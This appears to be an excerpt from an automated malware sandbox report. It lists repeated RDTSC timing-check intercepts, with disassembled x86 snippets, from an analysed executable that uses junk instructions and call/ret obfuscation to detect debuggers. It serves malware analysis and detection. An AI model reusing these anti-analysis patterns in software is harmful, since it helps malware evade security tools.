Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA93AF second address: EA93DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDAC0B0C802h 0x0000000f jmp 00007FDAC0B0C7FFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA93DA second address: EA9402 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDAC110B286h 0x00000008 jmp 00007FDAC110B28Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007FDAC110B28Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA9402 second address: EA9408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFC727 second address: EFC7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FDAC110B28Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FDAC110B288h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov di, F37Dh 0x0000002e mov dword ptr [ebp+122D32F1h], edi 0x00000034 push 00000000h 0x00000036 jbe 00007FDAC110B286h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FDAC110B288h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 sub ebx, dword ptr [ebp+122D3607h] 0x0000005e push eax 0x0000005f push esi 0x00000060 push eax 0x00000061 push edx 0x00000062 jnp 00007FDAC110B286h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFD614 second address: EFD618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFD618 second address: EFD630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FDAC110B288h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFC89B second address: EFC917 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bl, ah 0x00000010 movzx ebx, dx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push esi 0x0000001b sub dword ptr [ebp+12454D80h], edi 0x00000021 pop ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FDAC0B0C7F8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov di, 74E7h 0x00000047 mov eax, dword ptr [ebp+122D1211h] 0x0000004d movsx ebx, cx 0x00000050 and edi, dword ptr [ebp+122D196Ch] 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, 0ED22481h 0x0000005d push eax 0x0000005e pushad 0x0000005f pushad 0x00000060 jo 00007FDAC0B0C7F6h 0x00000066 jnl 00007FDAC0B0C7F6h 0x0000006c popad 0x0000006d push eax 0x0000006e push edx 0x0000006f jl 00007FDAC0B0C7F6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA28BA second address: EA28BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA28BE second address: EA28D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FDAC0B0C7F6h 0x00000010 ja 00007FDAC0B0C7F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA28D4 second address: EA28DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA28DE second address: EA28E8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC0B0C7F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F07EF4 second address: F07F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC110B28Ch 0x00000009 jmp 00007FDAC110B294h 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F07F1E second address: F07F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FDAC0B0C7F6h 0x0000000c jmp 00007FDAC0B0C804h 0x00000011 jp 00007FDAC0B0C7F6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F07F4E second address: F07F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F07F54 second address: F07F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDAC0B0C807h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F0B9C6 second address: F0B9D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F0B9D0 second address: D2FA22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7DB605CCh 0x0000000f jmp 00007FDAC0B0C802h 0x00000014 push dword ptr [ebp+122D002Dh] 0x0000001a jmp 00007FDAC0B0C801h 0x0000001f call dword ptr [ebp+122D27B1h] 0x00000025 pushad 0x00000026 pushad 0x00000027 mov bh, al 0x00000029 add dword ptr [ebp+122D196Ch], edi 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 jne 00007FDAC0B0C7FEh 0x00000038 jnc 00007FDAC0B0C7F8h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 xor dword ptr [ebp+122D2EAEh], edx 0x00000048 mov dword ptr [ebp+122D38EFh], eax 0x0000004e mov dword ptr [ebp+122D17FCh], ebx 0x00000054 mov esi, 0000003Ch 0x00000059 cmc 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D2EAEh], ebx 0x00000064 lodsw 0x00000066 clc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b cmc 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 jnl 00007FDAC0B0C808h 0x00000076 nop 0x00000077 jbe 00007FDAC0B0C813h 0x0000007d push eax 0x0000007e je 00007FDAC0B0C804h 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F0D0C2 second address: F0D0DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F0D0DF second address: F0D0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E96EFB second address: E96F05 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F13743 second address: F13747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F139F9 second address: F139FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F13B48 second address: F13B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F13CE7 second address: F13D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAC110B28Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDAC110B293h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007FDAC110B286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F13D14 second address: F13D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1A1AC second address: F1A1BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1A1BC second address: F1A1D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FDAC0B0C7F8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F19D48 second address: F19D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F19D55 second address: F19D67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FDAC0B0C7FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F19D67 second address: F19D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDAC110B286h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1AF05 second address: F1AF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC0B0C800h 0x00000009 jmp 00007FDAC0B0C7FBh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDAC0B0C7FDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1AF36 second address: F1AF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1AF3A second address: F1AF51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FDAC0B0C7FEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007FDAC0B0C7F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1AF51 second address: F1AF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1AF57 second address: F1AF61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAC0B0C7F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1EA2F second address: F1EA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1EA39 second address: F1EA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1EA40 second address: F1EA58 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDAC110B28Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FDAC110B286h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE96CD second address: EE96D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE96D3 second address: EE96E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE9803 second address: EE9808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE98DD second address: EE98F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC110B293h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE98F5 second address: EE98FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE98FB second address: EE9928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC110B28Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE9ECB second address: EE9ED9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE9FD9 second address: EEA010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAC110B28Dh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jp 00007FDAC110B28Eh 0x00000014 jnp 00007FDAC110B288h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDAC110B28Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA010 second address: EEA017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA017 second address: EEA025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA025 second address: EEA029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA029 second address: EEA058 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007FDAC110B286h 0x00000011 jmp 00007FDAC110B291h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA058 second address: EEA05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA28F second address: EEA293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA293 second address: EEA297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA963 second address: EEA968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEA968 second address: EEA979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEAACB second address: EEAAEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAC110B295h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEAAEB second address: EEAAF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED39 second address: F1ED3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED3D second address: F1ED41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED41 second address: F1ED47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED47 second address: F1ED4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED4E second address: F1ED59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED59 second address: F1ED5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1ED5F second address: F1ED63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1EEAF second address: F1EEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1EEB3 second address: F1EEB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1F04E second address: F1F056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1F056 second address: F1F05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F1F151 second address: F1F156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25349 second address: F2534D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F2534D second address: F25351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25945 second address: F2594B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F2594B second address: F2594F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F2594F second address: F25955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25C13 second address: F25C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25C1D second address: F25C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25C21 second address: F25C2B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F25C2B second address: F25C5B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDAC110B292h 0x00000008 jp 00007FDAC110B28Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jl 00007FDAC110B286h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F261A8 second address: F261AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F2506A second address: F25082 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FDAC110B28Eh 0x00000010 jbe 00007FDAC110B286h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F29BF0 second address: F29BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FDAC0B0C7FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F333AA second address: F333B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDAC110B288h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F333B8 second address: F333BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F333BE second address: F333C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
